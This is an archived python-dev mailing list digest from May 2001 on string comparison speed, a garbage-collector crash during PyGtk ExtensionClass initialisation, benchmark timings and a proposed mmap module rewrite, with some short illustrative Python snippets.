In-Reply-To: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
References: <LNBBLJKPBEHFEDALKOLCEEHOKCAA.tim.one@home.com>
Message-ID: <200105170641.f4H6fFn03235@mira.informatik.hu-berlin.de>

> 1. String objects are also equal despite being different objects,
>    if their ob_sinterned pointers are equal and non-NULL.  So if
>    you're looking for every trick in & out of the book, that's
>    another one.

That does not help. In the entire test suite, there are 0 instances
where strings are compared which are not identical, but have equal
ob_sinterned pointers.

> > So 5% of the calls are with identical strings, for which I can
> > immediately decide the outcome.
>
> But also at the cost of doing a fruitless compare and branch in 95%
> of calls.

Whether there's a fruitless branch depends on your compiler. With gcc
3, you can write

	if (__builtin_expect(a == b, 0)) {

and then the body of the if block will be moved out of the way of
linear control flow.

> Any idea where those 800,000 virgin calls to oldcomp are coming
> from?  That's a lot.

As far as I could trace it, most of them come from lookdict_string (at
various locations inside this function).

> > #comps:                        2949421
> > #memcmps:                       917776
> >
> > So still, ca. 30% can be decided by first byte.
> 
> Sorry, I couldn't follow this part, except noting that 917776 is about 30% of
> 2949421, in which case I would have expected you to say that 70% can be
> decided by first byte.

Oops, you are right.
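
Tim's correction is easy to confirm from the two counters quoted above:

```python
comps = 2949421    # comparisons counted in the test suite run
memcmps = 917776   # of those, the ones that still needed memcmp()

needed_memcmp = memcmps / comps
decided_early = 1 - needed_memcmp
print(f"{needed_memcmp:.1%} needed memcmp, {decided_early:.1%} decided earlier")
```

About 31.1% of the comparisons reached memcmp(), so roughly 68.9% were
settled before it, which is the "70%" Tim expected.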

> It's clearer that this is going to hurt sorting (& bisect etc), by
> adding yet another layer of function call to get Py_LT resolved (as
> for dict compares too, the string richcmp can't do anything to speed
> up Py_LT that string oldcmp can't do just as efficiently -- indeed,
> that's the great advantage oldcmp's "compare first character" test
> had: that *can* decide Py_LT in one byte much of the time (but
> length comparison cannot)).

So to support sorting better, I should special-case Py_LT in
string_richcompare also, to avoid the function call ?-)
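
Tim's point that a first-character test can often settle `Py_LT` on its
own, while a length test cannot, can be illustrated with a three-way
comparison that checks the first byte before comparing the rest. This is a
Python sketch written for this discussion, not CPython's `string_compare`;
it uses `bytes` so that "first byte" is literal, and slicing plus `<`/`>`
stands in for `memcmp()`.

```python
def string_cmp3(a: bytes, b: bytes) -> int:
    """Three-way comparison with a first-byte shortcut.

    Returns a negative, zero or positive int, like cmp().  When the first
    bytes differ, the sign (and so the answer to a < b) is known at once.
    """
    min_len = min(len(a), len(b))
    c = 0
    if min_len > 0:
        c = a[0] - b[0]                   # first-byte shortcut
        if c == 0:
            # Stand-in for memcmp() over the common prefix.
            pa, pb = a[:min_len], b[:min_len]
            c = (pa > pb) - (pa < pb)
    if c != 0:
        return c
    # Common prefix is equal: the shorter string sorts first.
    return (len(a) > len(b)) - (len(a) < len(b))
```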

> Note too earlier mail about how adding a richcmp slot to strings will
> suddenly slow cmp(string1, string2) (which is the usual way to program a
> search tree, because cmp() *used* to call a string comparison routine only
> once; but after adding a richcmp slot, each cmp(string1, string2) will call
> the richcmp slot from 1 thru 3 times (data-dependent)).

Yes, that is a serious problem. Fortunately, very few calls in my
programs go to string_compare through cmp() now. But then, your
programs are different, of course...

Regards,
Martin


From mal at lemburg.com  Thu May 17 08:54:37 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 08:54:37 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B0375AD.24E039B0@lemburg.com>

skip at pobox.com wrote:
> 
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
> 
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>         PyObject_HEAD_INIT(NULL)
>         0,                              /* ob_size */
>         "GtkTreeSortable",                      /* tp_name */
>         sizeof(PyPureMixinObject),      /* tp_basicsize */
>         ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)
> 
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.

I wonder how the GC collector could "see" the type object before
it has been initialized... since PyGtkTreeSortable_Type is a static
C array and not a known PyObject until you add it to some Python
dictionary as type object or use it for creating instances, it
seems strange that the GC collector can reach out for it and
get hit by the fact that it is not yet properly initialized.

Some logic in PyExtensionClass_Export() or the GTK module must
be twisted.
 
> The workaround turns out to be exceedingly simple:
> 
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
> 
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From fredrik at effbot.org  Thu May 17 09:00:20 2001
From: fredrik at effbot.org (Fredrik Lundh)
Date: Thu, 17 May 2001 09:00:20 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>

Skip wrote:
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
> 
>     PyExtensionClass PyGtkTreeSortable_Type = {
>        PyObject_HEAD_INIT(NULL)
>        0, /* ob_size */
>        "GtkTreeSortable", /* tp_name */
>        sizeof(PyPureMixinObject), /* tp_basicsize */
>        ...
>     };
> 
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time. Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime

footnote: this is usually done in the module init function, *before*
the call to Py_InitModule.  see:

    http://www.python.org/doc/FAQ.html#3.24

if the garbage collector can run after Python calls a module's init-
function, but before that module calls back into Python, anything
can happen...

Cheers /F


From skip at pobox.com  Thu May 17 09:04:06 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:04:06 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
In-Reply-To: <3B0375AD.24E039B0@lemburg.com>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<3B0375AD.24E039B0@lemburg.com>
Message-ID: <15107.30694.131193.989215@beluga.mojam.com>

    mal> I wonder how the GC collector could "see" the type object before it
    mal> has been initialized... since PyGtkTreeSortable_Type is a static C
    mal> array and not a known PyObject until you add it to some Python
    mal> dictionary as type object or use it for creating instances, it
    mal> seems strange that the GC collector can reach out for it and get
    mal> hit by the fact that it is not yet properly initialized.

It is actually PyGtkWidget_Type that is not yet initialized when it is
placed in the bases tuple for one of its subclasses.  GC traverses that
tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
whose ob_type field has not yet been initialized.  The actual object whose
bases tuple is being traversed is (in all the crashes I encountered),
GdkDragContext.  The registration calls could perhaps be reordered.
Currently GdkDragContext is patched up before GtkWidget, its base class.
This code is generated by James Henstridge's wrapper code generator, so
perhaps he can maintain the necessary class hierarchy relationships and
ensure that base classes are initialized before their subclasses.
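
Ensuring that base classes are initialized before their subclasses amounts
to a topological sort of the class hierarchy. A minimal depth-first sketch,
assuming the generator can produce a mapping from each class name to its
direct bases (`init_order` and that input format are hypothetical, not part
of the wrapper generator):

```python
def init_order(bases):
    """Return class names ordered so every base comes before its subclasses.

    `bases` maps a class name to the names of its direct base classes.
    Raises ValueError if the hierarchy contains a cycle.
    """
    order = []
    state = {}  # name -> 1 while being visited, 2 once emitted

    def visit(name):
        if state.get(name) == 2:
            return
        if state.get(name) == 1:
            raise ValueError(f"inheritance cycle through {name}")
        state[name] = 1
        for base in bases.get(name, ()):
            visit(base)           # emit all bases first
        state[name] = 2
        order.append(name)

    for name in bases:
        visit(name)
    return order
```

For the case above, `init_order({"GdkDragContext": ["GtkWidget"],
"GtkWidget": []})` returns `["GtkWidget", "GdkDragContext"]`. On Python 3.9
and later, `graphlib.TopologicalSorter` provides the same kind of ordering
in the standard library.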

Skip


From skip at pobox.com  Thu May 17 09:07:15 2001
From: skip at pobox.com (skip at pobox.com)
Date: Thu, 17 May 2001 02:07:15 -0500
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
References: <15107.29409.242342.200378@beluga.mojam.com>
	<00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <15107.30883.680397.280556@beluga.mojam.com>

    Fredrik> footnote: this is usually done in the module init function,
    Fredrik> *before* the call to Py_InitModule.  see:

    Fredrik>     http://www.python.org/doc/FAQ.html#3.24

    Fredrik> if the garbage collector can run after Python calls a module's
    Fredrik> init-function, but before that module calls back into Python,
    Fredrik> anything can happen...

Thanks for pointing that out.  Py_InitModule is indeed called before the
fixup occurs.

Skip


From mal at lemburg.com  Thu May 17 09:09:38 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:09:38 +0200
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a 
 workaround
References: <15107.29409.242342.200378@beluga.mojam.com>
		<3B0375AD.24E039B0@lemburg.com> <15107.30694.131193.989215@beluga.mojam.com>
Message-ID: <3B037932.476F475A@lemburg.com>

skip at pobox.com wrote:
> 
>     mal> I wonder how the GC collector could "see" the type object before it
>     mal> has been initialized... since PyGtkTreeSortable_Type is a static C
>     mal> array and not a known PyObject until you add it to some Python
>     mal> dictionary as type object or use it for creating instances, it
>     mal> seems strange that the GC collector can reach out for it and get
>     mal> hit by the fact that it is not yet properly initialized.
> 
> It is actually PyGtkWidget_Type that is not yet initialized when it is
> placed in the bases tuple for one of its subclasses.  GC traverses that
> tuple, then dives into each element.  It hits the PyGtkWidget_Type object,
> whose ob_type field has not yet been initialized.  The actual object whose
> bases tuple is being traversed is (in all the crashes I encountered),
> GdkDragContext.  The registration calls could perhaps be reordered.
> Currently GdkDragContext is patched up before GtkWidget, its base
> class.  This code is generated by James Henstridge's wrapper code
> generator, so perhaps he can maintain the necessary class hierarchy
> relationships and ensure that base classes are initialized before their
> subclasses.

Wouldn't it be easier to simply set the ob_type fields right at the
start of the initGtk() function? This is what I do for all
my extensions and I've never seen any problems with it.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:18:23 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:18:23 +0800 (WST)
Subject: [Python-Dev] Re: GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <Pine.LNX.4.33.0105171515140.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001 skip at pobox.com wrote:

>
> Over the past couple days I've included python-dev on various messages in an
> ongoing thread about a segmentation violation I was getting with the new
> PyGtk2 wrappers.  With some excellent assistance from the GC maestro, Neil
> Schemenauer, I finally know what's going on and I have a simple workaround
> that lets me get back to work.  Here's a summary of the problem.
>
> When defining ExtensionClass types, you need to create and initialize a
> PyExtensionClass struct.  It looks something like so:
>
>     PyExtensionClass PyGtkTreeSortable_Type = {
> 	PyObject_HEAD_INIT(NULL)
> 	0,				/* ob_size */
> 	"GtkTreeSortable",			/* tp_name */
> 	sizeof(PyPureMixinObject),	/* tp_basicsize */
> 	...
>     };
>
> Note that the parameter to the PyObject_HEAD_INIT macro is NULL.  It would
> normally be the address of a type object (e.g. &PyType_Type).  However, Jim
> Fulton pointed out that on Windows you can't get the address of &PyType_Type
> object at compile time.  Accordingly, ExtensionClass provides a
> PyExtensionClass_Export macro whose responsibility is, in part, to set the
> ob_type field appropriately at runtime.  (I'm not sure why this Windows nit
> doesn't afflict other type declarations like PyTuple_Type.  I'm sure others
> will know why.  I just accept Jim's word as gospel and move on...)

Well, for Extension Classes, PyType_Type is not correct either.  And
because ExtensionClass is loaded at runtime, we can't set the ob_type
field in the initialiser even on Unix systems.

>
> A problem arises if the garbage collector runs while the module
> initialization function is running, but before all the ob_type fields have
> been assigned their correct values.  In this case, a one-element tuple
> representing the bases of a particular PyGtk extension class was traversed
> by the garbage collector.
>
> The workaround turns out to be exceedingly simple:
>
>     import gc
>     gc.disable()
>     import gtk
>     gc.enable()
>
> I can handle doing that from Python code for the time being and will leave
> it up to others to decide how, if at all, ExtensionClass should be changed
> to correct the problem.

Thanks for debugging this problem, Skip.  If we don't find a correct
solution to the problem, I can put the gc disable/enable calls inside the
gtk/__init__.py module.
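If the disable/enable calls do end up in `gtk/__init__.py`, it may be worth making them exception-safe, so that a failed import cannot leave the collector switched off, and restoring whatever state the caller had instead of unconditionally re-enabling GC. A minimal sketch follows; `gc_paused` is a hypothetical helper name, and `json` merely stands in for the extension module being imported.

```python
import contextlib
import gc
import importlib

@contextlib.contextmanager
def gc_paused():
    """Temporarily disable the cyclic garbage collector.

    The previous enabled/disabled state is restored on exit, even if the
    body raises (for example, because the import fails).
    """
    was_enabled = gc.isenabled()
    gc.disable()
    try:
        yield
    finally:
        if was_enabled:
            gc.enable()

# Usage: import a module while automatic collection cannot run.
# "json" is only a placeholder for the real extension module (e.g. gtk).
with gc_paused():
    mod = importlib.import_module("json")
```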

James.


From mal at lemburg.com  Thu May 17 09:26:32 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 09:26:32 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com>
Message-ID: <3B037D27.E258C363@lemburg.com>

Tim Peters wrote:
> 
> [MAL]
> > Since it is possible that these figures result from my specific
> > machine setup, I'd like to know what other people see on their
> > machines.
> 
> Is this the same machine where you were able to get 15% difference a few
> years ago by adding or removing an unreachable printf in ceval.c (or was that
> Vladimir)?  If so, I bet it's degenerated to random 50% difference since then
> <wink>.

That must have been Vladimir's machine... even though I do admit
that some small reordering changes do result in speedups of
up to 10% -- probably due to the compiler accidentally creating
code which the CPU's cache management likes.
 
> My Win98SE box is *astonishingly* useless for timings.  Without fail, the
> first time I run pystone after a reboot yields a result a solid 50% higher
> than the second or subsequent times I run it (yes, it's major-league *slower*
> the second time).  This is true across dozens of trials over several months,
> and across all versions of Python.

On Linux the situation is somewhat different; still, I'm executing
the tests 10 times each, and for the figures I posted, I even
ran pybench twice and only took the second readings as basis.
 
> And simple little loops routinely vary in reported runtime by a factor of 3.
> I may have to dig my old Win95 box out of the packing crate <0.6 wink>.
> 
> None of that changes, of course, that the numbers you got are scary.

Sure are... but I'm not so much interested in the absolute
numbers -- it's the hot-spots which showed up that scare me:
e.g. dictionary creation seems to have suffered along the way
for some reason, function calls are even slower now than they
were previously and other important tasks such as instance
creation take a similar hit (probably as a result of the other
two).

Running the same test for 2.1 vs. 2.0 there's not much to
notice, so the important changes seem to be originating in
the move from 1.5.2 to 2.0.

-- 
Marc-Andre Lemburg
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From james at daa.com.au  Thu May 17 09:33:17 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 15:33:17 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <00c101c0de9f$0a6c4d10$e46940d5@hagrid>
Message-ID: <Pine.LNX.4.33.0105171522400.409-100000@quoll.daa.com.au>

On Thu, 17 May 2001, Fredrik Lundh wrote:

> footnote: this is usually done in the module init function, *before*
> the call to Py_InitModule.  see:

The PyExtensionClass_Export() function requires a pointer to the module
dictionary so that it can add itself to the module.  Unfortunately this
requires that Py_InitModule have been called beforehand.

I guess this means that the current ExtensionClass API will need to be
modified in order to allow ExtensionClasses to be initialised before
Py_InitModule.

>
>     http://www.python.org/doc/FAQ.html#3.24
>
> if the garbage collector can run after Python calls a module's init-
> function, but before that module calls back into Python, anything
> can happen...

James.


From mwh at python.net  Thu May 17 09:43:38 2001
From: mwh at python.net (Michael Hudson)
Date: 17 May 2001 08:43:38 +0100
Subject: [Python-Dev] Performance compares
In-Reply-To: "M.-A. Lemburg"'s message of "Thu, 17 May 2001 09:26:32 +0200"
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com>
Message-ID: <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>

"M.-A. Lemburg" <mal at lemburg.com> writes:

> Sure are... but I'm not so much interested in the absolute numbers
> -- it's the hot-spots which showed up that scare me: e.g. dictionary
> creation seems to have suffered along the way for some reason,
> function calls are even slower now than they were previously and
> other important tasks such as instance creation take a similar hit
> (probably as a result of the other two).

Have you tried fiddling with gc parameters?  If the GC does a
multi-generation trawl through the heap in the middle of some test, that
might skew the numbers in unexpected ways.

Or not, of course.

Cheers,
M.

-- 
  CLiki pages can be edited by anybody at any time. Imagine the most
  fearsomely comprehensive legal disclaimer you have ever seen, and
  double it                        -- http://ww.telent.net/cliki/index


From mal at lemburg.com  Thu May 17 11:03:06 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:03:06 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk>
Message-ID: <3B0393CA.7B0E024C@lemburg.com>

Michael Hudson wrote:
> 
> "M.-A. Lemburg" <mal at lemburg.com> writes:
> 
> > Sure are... but I'm not so much interested in the absolute numbers
> > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > creation seems to have suffered along the way for some reason,
> > functions calls are even slower now than they were previously and
> > other important tasks such a instance creation take a similar hit
> > (probably as a result of the other two).
> 
> Have you tried fiddling with gc parameters?  If the GC does a multi
> generation trawl through the heap in the middle of some test, that
> might skew the numbers in unexpected ways.
> 
> Or not, of course.

No, I haven't tried fiddling with those. I'm not sure I want
to either ;-) ... the reason is that applications won't switch
off GC during execution, so the test is closer to real life.

Still, I'll rerun the test suite using gc.disable() and post the 
results.

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From mal at lemburg.com  Thu May 17 11:18:36 2001
From: mal at lemburg.com (M.-A. Lemburg)
Date: Thu, 17 May 2001 11:18:36 +0200
Subject: [Python-Dev] Performance compares
References: <LNBBLJKPBEHFEDALKOLCCEKNKCAA.tim.one@home.com> <3B037D27.E258C363@lemburg.com> <m3pud8mndh.fsf@atrus.jesus.cam.ac.uk> <3B0393CA.7B0E024C@lemburg.com>
Message-ID: <3B03976C.CF47961@lemburg.com>

"M.-A. Lemburg" wrote:
> 
> Michael Hudson wrote:
> >
> > "M.-A. Lemburg" <mal at lemburg.com> writes:
> >
> > > Sure are... but I'm not so much interested in the absolute numbers
> > > -- it's the hot-spots which showed up that scare me: e.g. dictionary
> > > creation seems to have suffered along the way for some reason,
> > > function calls are even slower now than they were previously and
> > > other important tasks such as instance creation take a similar hit
> > > (probably as a result of the other two).
> >
> > Have you tried fiddling with gc parameters?  If the GC does a multi
> > generation trawl through the heap in the middle of some test, that
> > might skew the numbers in unexpected ways.
> >
> > Or not, of course.
> 
> No, I haven't tried fiddling with those. I'm not sure I want
> to either ;-) ... the reason is that applications won't switch
> off GC during execution, so the test is closer to real life.
> 
> Still, I'll rerun the test suite using gc.disable() and post the
> results.

Turns out, the difference is not noticeable (< 1%).
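For anyone repeating this kind of measurement with today's standard library: `timeit` switches the collector off while timing by default, and its documentation suggests putting `gc.enable()` in the setup string to include GC costs. A minimal sketch comparing both settings; the dict-creation statement and the repetition counts are arbitrary choices for illustration, not pybench's.

```python
import timeit

STMT = "d = {'a': 1, 'b': 2, 'c': 3}"  # arbitrary dict-creation micro-benchmark

def best_time(setup, number=20_000, repeat=5):
    """Best-of-`repeat` time, in seconds, for `number` executions of STMT."""
    return min(timeit.repeat(STMT, setup=setup, number=number, repeat=repeat))

gc_off = best_time("pass")                    # timeit default: GC disabled
gc_on = best_time("import gc; gc.enable()")   # setup runs after timeit's disable
print(f"GC off: {gc_off:.4f}s  GC on: {gc_on:.4f}s  ratio: {gc_on / gc_off:.3f}")
```

Taking the minimum of several repeats is the usual way to reduce noise from other activity on the machine.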

-- 
Marc-Andre Lemburg
CEO eGenix.com Software GmbH
______________________________________________________________________
Company & Consulting:                           http://www.egenix.com/
Python Software:                        http://www.lemburg.com/python/


From gmcm at hypernet.com  Thu May 17 15:00:27 2001
From: gmcm at hypernet.com (Gordon McMillan)
Date: Thu, 17 May 2001 09:00:27 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: <15107.29409.242342.200378@beluga.mojam.com>
Message-ID: <3B03932B.8219.CCBF9F3F@localhost>

[Skip] 

> Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> It would normally be the address of a type object (e.g.
> &PyType_Type).  However, Jim Fulton pointed out that on Windows
> you can't get the address of &PyType_Type object at compile time.

This is MS being passive-aggressive. If you tell MSVC the 
source is C++, it will magically find the address of 
PyType_Type at compile time, but their language lawyers 
apparently believe the C spec disallows this. Standards
conformant and incompatible -

what-MS-calls-"win-win"-ly y'rs

- Gordon


From guido at digicool.com  Thu May 17 16:04:59 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 09:04:59 -0500
Subject: [Python-Dev] Comparison speed
In-Reply-To: Your message of "Thu, 17 May 2001 08:12:18 +0200."
             <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
References: <LNBBLJKPBEHFEDALKOLCGEKMKCAA.tim.one@home.com>  
            <200105170612.f4H6CI703034@mira.informatik.hu-berlin.de> 
Message-ID: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>

> I'd still be in favour of giving strings a richcompare, since it
> allows to optimize what I think is the single most frequent case:
> Py_EQ on strings.

I have always thought that eventually (but long before Py3K!) all
objects would only support rich comparisons and the __cmp__ and
tp_compare slots would become completely obsolete.  I realize I
probably haven't expressed this thought clearly, and I'm not going to
push for this to happen quickly or forcefully, but it's nevertheless
how I see things.  I expect it would allow a tremendous cleanup of the
comparison code.  It will never reach the simplicity of cmp() -- but
think of Einstein's (?) rule "things should be as simple as they can
be, but no simpler."  Clearly cmp() was too simple. :-)

Anyway, it worries me whenever I hear someone express the thought that
adding rich comparisons to a particular object type would be a bad
idea because it would slow things down.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From guido at digicool.com  Thu May 17 16:37:30 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:37:30 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 09:00:27 EDT."
             <3B03932B.8219.CCBF9F3F@localhost> 
References: <3B03932B.8219.CCBF9F3F@localhost> 
Message-ID: <200105171437.f4HEbUB09503@odiug.digicool.com>

> [Skip] 
> 
> > Note that the parameter to the PyObject_HEAD_INIT macro is NULL. 
> > It would normally be the address of a type object (e.g.
> > &PyType_Type).  However, Jim Fulton pointed out that on Windows
> > you can't get the address of &PyType_Type object at compile time.
> 
> This is MS being passive-aggressive. If you tell MSVC the 
> source is C++, it will magically find the address of 
> PyType_Type at compile time, but their language lawyers 
> apparently  believe the C spec disallows this. Standards 
> conformant and incompatible -
> 
> what-MS-calls-"win-win"-ly y'rs
> 
> - Gordon

I don't think MS blames it on the language spec so much; it's probably
more that they use the spec as an excuse not to fix their
implementation.  The problem only occurs when the definition of the
symbol is in a different DLL than the reference.  This is why built-in
types like PyTuple_Type don't have this problem.  I guess for C++ they
have to do a dynamic initializer anyway, so they can make this work,
but they haven't bothered to make it work for C.

My other point is that Skip's problem is clearly a gtk bug: it
shouldn't have exposed the type before fully initializing it.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From james at daa.com.au  Thu May 17 16:48:43 2001
From: james at daa.com.au (James Henstridge)
Date: Thu, 17 May 2001 22:48:43 +0800 (WST)
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem
 and a workaround
In-Reply-To: <200105171437.f4HEbUB09503@odiug.digicool.com>
Message-ID: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>

On Thu, 17 May 2001, Guido van Rossum wrote:

> My other point is that Skip's problem is clearly a gtk bug: it
> shouldn't have exposed the type before fully initializing it.

On further investigation, it turned out that it was caused by a bug in my
code generator that caused one extension class to be initialised before
its base class (in fact, that particular extension class shouldn't have
had any base classes).  It was just the cyclic GC code triggering the bug.

It will be fixed in the next snapshot of pygtk for GTK+ 2.0

James.

-- 
Email: james at daa.com.au
WWW:   http://www.daa.com.au/~james/


From guido at digicool.com  Thu May 17 16:52:54 2001
From: guido at digicool.com (Guido van Rossum)
Date: Thu, 17 May 2001 10:52:54 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
In-Reply-To: Your message of "Thu, 17 May 2001 22:48:43 +0800."
             <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au> 
Message-ID: <200105171452.f4HEqse09691@odiug.digicool.com>

> On further investigation, it turned out that it was caused by a bug in my
> code generator that caused one extension class to be initialised before
> its base class (in fact, that particular extension class shouldn't have
> had any base classes).  It was just the cyclic GC code triggering the bug.
> 
> It will be fixed in the next snapshot of pygtk for GTK+ 2.0

Excellent news, James!  I love the open source process!

--Guido van Rossum (home page: http://www.python.org/~guido/)


From barry at digicool.com  Thu May 17 17:04:50 2001
From: barry at digicool.com (Barry A. Warsaw)
Date: Thu, 17 May 2001 11:04:50 -0400
Subject: [Python-Dev] GC and ExtensionClass - a summary of the problem and a workaround
References: <Pine.LNX.4.33.0105172240320.22792-100000@james.daa.com.au>
	<200105171452.f4HEqse09691@odiug.digicool.com>
Message-ID: <15107.59538.421007.37251@anthem.wooz.org>

>>>>> "GvR" == Guido van Rossum <guido at digicool.com> writes:

    GvR> Excellent news, James!  I love the open source process!

No kidding!

http://perens.com/Articles/StandTogether.html

:)


From Barrett at stsci.edu  Thu May 17 16:56:49 2001
From: Barrett at stsci.edu (Paul Barrett)
Date: Thu, 17 May 2001 10:56:49 -0400
Subject: [Python-Dev] mmap module
Message-ID: <3B03E6B1.A19F6594@STScI.Edu>

In the CVS log of the mmapmodule.c, Tim Peters says:

"The code really needs to be rethought from scratch (not by me, though
...)."

Well, I might be the person to do the rethinking, but I'd first like
to know what Tim has in mind.  I've been playing around with this
module lately and tend to agree that some enhancements could be made,
particularly to prevent "bus errors" and "segmentation faults".  The
ability to have offsets into a file that are not multiples of the
system pagesize would also be nice.

I'd be willing to submit a PEP on a new mmapmodule, once I know what
others would like.

 -- Paul

-- 
Paul Barrett, PhD      Space Telescope Science Institute
Phone: 410-338-4475    ESS/Science Software Group
FAX:   410-338-4767    Baltimore, MD 21218


From tim.one at home.com  Thu May 17 18:02:38 2001
From: tim.one at home.com (Tim Peters)
Date: Thu, 17 May 2001 12:02:38 -0400
Subject: [Python-Dev] Comparison speed
In-Reply-To: <200105171405.JAA14836@cj20424-a.reston1.va.home.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCIENEKCAA.tim.one@home.com>

[Guido]
> I have always thought that eventually (but long before Py3K!) all
> objects would only support rich comparisons and the __cmp__ and
> tp_compare slots would become completely obsolete.  I realize I
> probably haven't expressed this thought clearly, and I'm not going to
> push for this to happen quickly or forcefully, but it's nevertheless
> how I see things.  I expect it would allow a tremendous cleanup of the
> comparison code.  It will never reach the simplicity of cmp() -- but
> think of Einstein's (?) rule "things should be as simple as they can
> be, but no simpler."  Clearly cmp() was too simple. :-)
>
> Anyway, it worries me whenever I hear someone express the thought that
> adding rich comparisons to a particular object type would be a bad
> idea because it would slow things down.

At the moment, "almost all" comparisons in the dynamic sense have no need of
richcmps, so clearly "Clearly cmp() was too simple. :-)" was too simple
<wink>.  For now richcmps are a tail-wagging-the-dog phenomenon, or more like
the tail growing 10 pounds of dense matted hair, making the once-frisky puppy
slow to a crawl because its butt is scraping the ground <wink>.

Martin and I can resolve our differences wrt strings via getting rid of old
strcmp entirely.  Do you like the implications?

1. Code using cmp(string1, string2) will clearly run significantly
   slower, calling string comparison 1 (when == obtains), 2 (when <
   obtains), or 3 (when > obtains) times instead of always once only.
   Since == is the least likely outcome when using cmp() on strings
   (you can conclude that by instrumenting Python, or by common
   sense <0.5 wink>), the number of string compare calls more than
   doubles in practice for string cmp()-slinging programs (which
   includes existing well-written tree-based lookup schemes).

2. String dictionary lookup will, unlike the general non-dict case
   Martin instrumented, never pass the new "are the pointers the
   same?" richcmp Py_EQ test (because dict lookup already makes that
   test inline).  So if old strcmp goes away, dict lookups that
   have to resort to strcmp will start paying for hopeless tests.
   OTOH, the "pointers equal?" test looks of dubious value for the
